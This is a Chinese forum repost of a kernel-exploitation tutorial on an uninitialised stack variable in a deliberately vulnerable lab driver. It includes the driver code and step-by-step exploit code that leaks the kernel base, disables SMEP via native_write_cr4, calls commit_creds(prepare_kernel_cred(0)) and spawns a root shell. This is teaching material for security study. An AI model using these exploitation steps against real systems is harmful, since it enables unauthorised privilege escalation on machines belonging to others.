查看: 70|回复: 0

[Pwn] linux内核提权系列教程(3):栈变量未初始化漏洞

[复制链接]
发表于 2020-5-4 11:13:30 | 显示全部楼层 |阅读模式

一、 漏洞分析1. 程序分析
总共两个驱动号,对应两个功能。
case UNINITIALISED_STACK_ALLOC:
  {
  ret = copy_to_stack((char*)p_arg);
  break;
  }
  case UNINITIALISED_STACK_USE:
  {
  use_obj_args use_obj_arg;
  if(copy_from_user(&use_obj_arg, p_arg, sizeof(use_obj_args)))
  return-EINVAL;
  use_stack_obj(&use_obj_arg);
  break;
  }
  

第1个功能->UNINITIALISED_STACK_ALLOC
// 布置内核栈: 能往内核栈上传入4096字节的数据
  #define BUFF_SIZE 4096
  noinline staticint copy_to_stack(char __user *user_buff)
  {
  int ret;
  char buff[BUFF_SIZE];
  ret = copy_from_user(buff, user_buff, BUFF_SIZE);
  buff[BUFF_SIZE - 1] = 0;
  return ret;
  }
  

第2个功能-> UNINITIALISED_STACK_USE
// 使用内核栈: 初始化内核栈数据
  noinline staticvoid use_stack_obj(use_obj_args *use_obj_arg)
  {
  volatile stack_obj s_obj; //volatile表示要求编译器不要对该变量作任何优化
  if(use_obj_arg->option == 0)
  {
  s_obj.fn = uninitialised_callback;
  s_obj.fn_arg = use_obj_arg->fn_arg;
  }
  s_obj.fn(s_obj.fn_arg);
  }
  
// 结构
  typedefstruct stack_obj
  {
  int do_callback;
  long fn_arg;
  void(*fn)(long);
  char buff[48];
  }stack_obj;
  typedefstruct use_obj_args
  {
  int option;
  long fn_arg;
  }use_obj_args;
  

2. 漏洞分析
漏洞:只有(use_obj_arg->option == 0)时,才会初始化stack_obj对象。
利用:构造(use_obj_arg->option != 0),产生内核栈变量未初始化引用错误。本驱动其实简化了漏洞利用过程,因为可以直接利用驱动号UNINITIALISED_STACK_ALLOC来布置内核栈,不需要考虑用系统调用来布置。
二、 漏洞利用1. 利用步骤
完整代码见exp_uninitialised_stack.c。
(1)单核执行
//step 1: 让程序只在单核上运行,以免只关闭了1个核的smep,却在另1个核上跑shell
  void force_single_core()
  {
  cpu_set_t mask;
  CPU_ZERO(&mask);
  CPU_SET(0,&mask);
  if(sched_setaffinity(0,sizeof(mask),&mask))
  printf("[-----] Error setting affinity to core0, continue anyway, exploit may fault \n");
  return;
  }
  

(2)泄露内核基址
// step 2: 构造 page_fault 泄露kernel地址。从dmesg读取后写到/tmp/infoleak,再读出来
  pid_t pid=fork();
  if(pid==0){
  do_page_fault();
  exit(0);
  }
  int status;
  wait(&status);    // 等子进程结束
  //sleep(10);
  printf("[+] Begin to leak address by dmesg![+]\n");
  size_t kernel_base = get_info_leak()-sys_ioctl_offset;
  printf("[+] Kernel base addr : %p [+] \n", kernel_base);
  

(3)关闭smep
利用UNINITIALISED_STACK_ALLOC功能在内核栈上布置目标函数和所需参数,这样在发生栈变量未初始化使用时就会触发执行目标函数。
// step 3: 关闭smep
  char buf[4096];
  memset(buf, 0, sizeof(buf));
  struct use_obj_args use_obj={
  .option=1,
  .fn_arg=1337,
  };
  for(int i=0; i<4096; i+=16)
  {
  memcpy(buf+i, &fake_cr4, 8);   // 注意是fake_cr4所在地址
  memcpy(buf+i+8, &native_write_cr4_addr, 8);  // 注意是native_write_cr4_addr所在地址
  }
  ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);
  ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);
  

(4)提权—commit_creds(prepare_kernel_cred(0))
// step 4: 提权,执行get_root();  注意是把get_root()的地址拷贝过去,转一次
  size_t get_root_addr = &get_root;
  memset(buf, 0, sizeof(buf));
  for(int i=0; i<4096; i+=8)
  memcpy(buf+i, &get_root_addr, 8);
  ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);
  ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);
  

(5)返回shell
// step 5: 获得shell
  if(getuid()==0)
  {
  printf("[+] Congratulations! You get root shell !!! [+]\n");
  system("/bin/sh");
  }
  

2. 利用结果
成功提权:

linux内核提权系列教程(3):栈变量未初始化漏洞

linux内核提权系列教程(3):栈变量未初始化漏洞
1-exp_uninitialised_stack_succeed.png参考:
https://invictus-security.blog/2017/06/
https://github.com/invictus-0x90/vulnerable_linux_driver
文章首发于先知-linux内核提权系列教程(3):栈变量未初始化漏洞[1]
说明:实验所需的驱动源码、bzImage、cpio文件见我的github[2]进行下载。
本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书[3]。
References
[1] 先知-linux内核提权系列教程(3):栈变量未初始化漏洞: https://xz.aliyun.com/t/6301[2] 我的github: https://github.com/bsauce/kernel_exploit_series[3] 我的简书: https://www.jianshu.com/u/a12c5b882be2

往期推荐
linux内核提权系列教程(2):任意地址读写到提权的4种方法
CVE-2017-17562 GoAhead远程代码执行漏洞分析
D-Link service.cgi远程命令执行漏洞分析
linux内核提权系列教程(1):堆喷射函数sendmsg与msgsend利用

linux内核提权系列教程(3):栈变量未初始化漏洞

linux内核提权系列教程(3):栈变量未初始化漏洞


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046
微信公众号
快速回复 返回顶部 返回列表